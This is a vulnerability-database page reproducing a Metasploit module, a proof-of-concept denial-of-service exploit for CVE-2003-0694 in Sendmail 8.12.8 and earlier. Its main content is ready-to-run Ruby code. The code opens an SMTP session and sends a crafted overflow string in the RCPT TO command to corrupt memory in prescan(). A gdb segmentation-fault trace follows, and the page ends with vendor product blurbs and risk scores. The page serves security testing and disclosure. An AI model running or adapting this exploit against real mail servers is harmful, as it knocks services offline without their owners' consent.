Lucene search
K

Sendmail SMTP Address prescan Memory Corruption

🗓️ 12 Sep 2009 10:56:36Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 50 Views

Sendmail SMTP Address prescan Memory Corruption denial of service module for versions 8.12.8 and earlier. Vulnerability in the prescan() method parsing SMTP headers, allowing limited likelihood for arbitrary code execution

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Smtp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Sendmail SMTP Address prescan Memory Corruption',
      'Description'    => %q{
        This is a proof of concept denial of service module for Sendmail versions
        8.12.8 and earlier. The vulnerability is within the prescan() method when
        parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00
        bytes can be used, limiting the likelihood for arbitrary code execution.
      },
      'Author'         => [ 'aushack' ],
      'References'     =>
        [
          [ 'OSVDB', '2577' ],
          [ 'CVE', '2003-0694' ],
          [ 'BID', '8641' ],
          [ 'EDB', '24' ]
        ],
      'DisclosureDate' => '2003-09-17'))
  end

  def run
    begin
      connect
      # we use connect instead of connect_login,
      # because we send our own malicious RCPT.
      # however we want to make use of MAILFROM
      # and raw_send_recv()
      #select(nil,nil,nil,23) # so we can attach gdb to the child PID

      sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28

      raw_send_recv("EHLO X\r\n")
      raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
      print_status("Sending DoS packet.")
      raw_send_recv("RCPT TO: #{sploit}\r\n")

      disconnect
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Couldn't connect to #{rhost}:#{rport}")
    rescue ::EOFError
      print_status("Sendmail stopped responding after sending trigger - target vulnerable.")
    end

  end
end

=begin
Program received signal SIGSEGV, Segmentation fault.
0x8073499 in ?? ()
(gdb) bt
#0   0x807e499 in ?? ()
#1   0x087e125 in ?? ()
#2   0x5c5c5c5c in ?? ()
Error accessing memory address 0x5c5c5c5c: Bad address.
=end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jan 2023 20:45Current
7.4High risk
Vulners AI Score7.4
CVSS 210
EPSS0.60185
50